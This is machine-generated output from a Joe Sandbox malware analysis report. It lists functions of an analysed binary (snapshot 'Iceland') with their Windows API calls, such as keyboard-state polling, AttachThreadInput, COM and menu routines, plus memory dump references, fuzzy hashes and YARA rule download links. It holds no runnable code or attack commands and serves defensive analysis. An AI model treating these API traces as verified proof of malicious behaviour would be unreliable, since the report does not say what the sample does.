                                                                                                                                                                                                                                                                Function 00A8A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 00A8A65D
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00A8A6DE
                                                                                                                                                                                                                                                                • GetKeyState.USER32(000000A0), ref: 00A8A6F9
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00A8A713
                                                                                                                                                                                                                                                                • GetKeyState.USER32(000000A1), ref: 00A8A728
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00A8A740
                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 00A8A752
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00A8A76A
                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000012), ref: 00A8A77C
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00A8A794
                                                                                                                                                                                                                                                                • GetKeyState.USER32(0000005B), ref: 00A8A7A6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 541375521-0
                                                                                                                                                                                                                                                                • Opcode ID: cf7cdb70430538dca758d9960cee052176dd52744d4b5de1da47b67318766052
                                                                                                                                                                                                                                                                • Instruction ID: 0111f848e87e91d07bb709cdfd41815ee107f74121f1c118197c276244f11c27
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf7cdb70430538dca758d9960cee052176dd52744d4b5de1da47b67318766052
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D41B6749047C96DFF31A76088043A5BEB06F31344F08816BD5C69A6C2FBA49DC8D7A3
                                                                                                                                                                                                                                                                Function 00AA9730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                • Opcode ID: 6eefda8e6d2ee01e84e2386eff9454e17e9816125f7e6c0808ba7d86fd40379e
                                                                                                                                                                                                                                                                • Instruction ID: 08af84d8fb63e05bde879fb5735b227176cc18779b78fa86390eab4b6b7954be
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6eefda8e6d2ee01e84e2386eff9454e17e9816125f7e6c0808ba7d86fd40379e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A051C631A00516ABCF14DF6CCA509BFB7B5BF6A360B204229E826E72D4DB35DD40C790
                                                                                                                                                                                                                                                                Function 00AA4189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoInitialize.OLE32 ref: 00AA41D1
                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 00AA41DC
                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,00AC0B44,?), ref: 00AA4236
                                                                                                                                                                                                                                                                • IIDFromString.OLE32(?,?), ref: 00AA42A9
                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00AA4341
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00AA4393
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                • Opcode ID: 04c71f41ef557bd9c8fec47f265d71b041874c3d725af9e6e3b1b20afdda51ca
                                                                                                                                                                                                                                                                • Instruction ID: dc50f23661541da33f5ce42787734d56ed00d5dddc67b6eb47f241026fabab64
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04c71f41ef557bd9c8fec47f265d71b041874c3d725af9e6e3b1b20afdda51ca
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E61A271608301EFD710DFA4D949FAABBE4EF8A714F100919F5859B291D7B0ED48CB92
                                                                                                                                                                                                                                                                Function 00A98BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 00A98C9C
                                                                                                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A98CAC
                                                                                                                                                                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A98CB8
                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A98D55
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00A98D69
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00A98D9B
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A98DD1
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00A98DDA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                • Opcode ID: b4e345f8bd21d175d92648d3bc01be248d3f6f4e84ff6bc4e92fc1dc150c095c
                                                                                                                                                                                                                                                                • Instruction ID: 1022dece3672068ba7bb6e82fa898d90ec1eab1e2955a868e171c379343e8f55
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4e345f8bd21d175d92648d3bc01be248d3f6f4e84ff6bc4e92fc1dc150c095c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24616A76604305AFCB10EF64C94099EB3E8FF9A310F04492EF98987251EB39E945CB92
                                                                                                                                                                                                                                                                Function 00AB46E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateMenu.USER32 ref: 00AB4715
                                                                                                                                                                                                                                                                • SetMenu.USER32(?,00000000), ref: 00AB4724
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AB47AC
                                                                                                                                                                                                                                                                • IsMenu.USER32(?), ref: 00AB47C0
                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00AB47CA
                                                                                                                                                                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AB47F7
                                                                                                                                                                                                                                                                • DrawMenuBar.USER32 ref: 00AB47FF
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                • String ID: 0$F
                                                                                                                                                                                                                                                                • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                • Opcode ID: 5f5436d8e4c22d85e4e0ef0f3e29a4dda44adb406ae9868debee5a333d1e8a1f
                                                                                                                                                                                                                                                                • Instruction ID: 58ebf6e1db0c7290aedad5a25d6389cdb90ec3635cf8318b8c6f779723c3409f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f5436d8e4c22d85e4e0ef0f3e29a4dda44adb406ae9868debee5a333d1e8a1f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50417779A0120AEFDB24DFA4D884EEA7BB9FF49314F144128FA45A7362D770A911CB50
                                                                                                                                                                                                                                                                Function 00A8282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                  • Part of subcall function 00A845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A84620
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00A828B1
                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32 ref: 00A828BC
                                                                                                                                                                                                                                                                • GetParent.USER32 ref: 00A828D8
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00A828DB
                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00A828E4
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00A828F8
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00A828FB
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                • Opcode ID: 9e683c4ce0a325d0544a45fdbacc2f8c951f0b0df6712d59015d3941b7d13a62
                                                                                                                                                                                                                                                                • Instruction ID: 15a137bf5774b85d3832c721e112392b7d1e580c1abe09a674ec73f69a961638
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e683c4ce0a325d0544a45fdbacc2f8c951f0b0df6712d59015d3941b7d13a62
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9921B074D00118BBCF04EBA4DC85EFEBBB4EF09350F004656B961A72A1EB355809DB60
                                                                                                                                                                                                                                                                Function 00A8290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                  • Part of subcall function 00A845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A84620
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00A82990
                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32 ref: 00A8299B
                                                                                                                                                                                                                                                                • GetParent.USER32 ref: 00A829B7
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00A829BA
                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00A829C3
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00A829D7
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00A829DA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                • Opcode ID: c669f8c1ff7d346e5ad5b2a42eb35c49cf738d37e4808088e4905102902c2f91
                                                                                                                                                                                                                                                                • Instruction ID: 5af335021de7f61c7e0fd5678520629fe9116659fbfe825233a1b93799b27342
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c669f8c1ff7d346e5ad5b2a42eb35c49cf738d37e4808088e4905102902c2f91
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C21CD79900118BBCF14FBA4DC85EFEBBB8EF08340F004556F951A72A2EB759809DB60
                                                                                                                                                                                                                                                                Function 00AB44BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00AB4539
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00AB453C
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AB4563
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AB4586
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00AB45FE
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00AB4648
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00AB4663
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00AB467E
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00AB4692
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00AB46AF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 312131281-0
                                                                                                                                                                                                                                                                • Opcode ID: df59e4218e469a432fc8400ce7d5c069187ba8b20824e8ad546fa739e8b8ba38
                                                                                                                                                                                                                                                                • Instruction ID: c299d04f739e77a65fbe2a23333aff2c8d21280499b8d699d52c72ef7c519305
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df59e4218e469a432fc8400ce7d5c069187ba8b20824e8ad546fa739e8b8ba38
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5616B75A00208AFDB10DFA8CD91FEE77B8EF09710F104159FA14E72A2D774A956DB50
                                                                                                                                                                                                                                                                Function 00A8BAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00A8BB18
                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00A8ABA8,?,00000001), ref: 00A8BB2C
                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 00A8BB33
                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A8ABA8,?,00000001), ref: 00A8BB42
                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A8BB54
                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00A8ABA8,?,00000001), ref: 00A8BB6D
                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A8ABA8,?,00000001), ref: 00A8BB7F
                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00A8ABA8,?,00000001), ref: 00A8BBC4
                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00A8ABA8,?,00000001), ref: 00A8BBD9
                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00A8ABA8,?,00000001), ref: 00A8BBE4
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                • Opcode ID: 2b3d255b67a1ef75fa2b1b694e64492925a228e33a96335c89a655f1a1b2a4cb
                                                                                                                                                                                                                                                                • Instruction ID: a9179ed6f5801e218bf615ffe8671f3a09f3bd9aefa9e24e837a3e6724e6e4d8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b3d255b67a1ef75fa2b1b694e64492925a228e33a96335c89a655f1a1b2a4cb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC319175924204AFDB10EBD4DC88FBA7BA9EB48352F104115FA05D71A4EB78A942CB34
                                                                                                                                                                                                                                                                Function 00A52FF3 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A53007
                                                                                                                                                                                                                                                                  • Part of subcall function 00A52D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A5DB51,00AF1DC4,00000000,00AF1DC4,00000000,?,00A5DB78,00AF1DC4,00000007,00AF1DC4,?,00A5DF75,00AF1DC4), ref: 00A52D4E
                                                                                                                                                                                                                                                                  • Part of subcall function 00A52D38: GetLastError.KERNEL32(00AF1DC4,?,00A5DB51,00AF1DC4,00000000,00AF1DC4,00000000,?,00A5DB78,00AF1DC4,00000007,00AF1DC4,?,00A5DF75,00AF1DC4,00AF1DC4), ref: 00A52D60
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A53013
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5301E
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A53029
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A53034
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5303F
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5304A
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A53055
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A53060
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5306E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                • Opcode ID: b7d82b437d866b8bb69f44de7a8959bbd9248396325b9c634ad71e89b6e52c15
                                                                                                                                                                                                                                                                • Instruction ID: 7d2d89ebb9963f920d916391a91d64bd4b102f3054328271b07764e74580452a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7d82b437d866b8bb69f44de7a8959bbd9248396325b9c634ad71e89b6e52c15
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E711B676100108BFCB11EF94DA42EDD3BB5FF16351B8144A5FE089F222DA31EE599B90
                                                                                                                                                                                                                                                                Function 00A22AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A22AF9
